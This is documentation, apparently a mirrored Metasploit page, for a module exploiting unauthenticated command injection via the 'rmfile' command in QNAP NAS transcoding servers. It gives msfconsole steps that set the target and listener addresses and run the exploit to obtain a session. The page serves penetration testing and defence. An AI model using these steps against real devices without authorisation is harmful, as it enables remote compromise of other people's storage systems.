Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/linux/misc/qnap_transcode_server.md
Views: 11788
Description
This module exploits an unauthenticated remote command injection vulnerability in QNAP NAS devices. The transcoding server listens on port 9251 by default and is vulnerable to command injection using the 'rmfile' command.
Vulnerable Application
QNAP designs and delivers high-quality network attached storage (NAS) and professional network video recorder (NVR) solutions to users from home, SOHO to small, medium businesses.
This module was tested successfully on a QNAP TS-431 with firmware version 4.3.3.0262 (20170727).
Verification Steps
Start
msfconsole
Do:
use exploit/linux/misc/qnap_transcode_server
Do:
set RHOST [IP]
Do:
set LHOST [IP]
Do:
run
You should get a session
Options
Delay
How long to wait (in seconds) for the device to download the payload.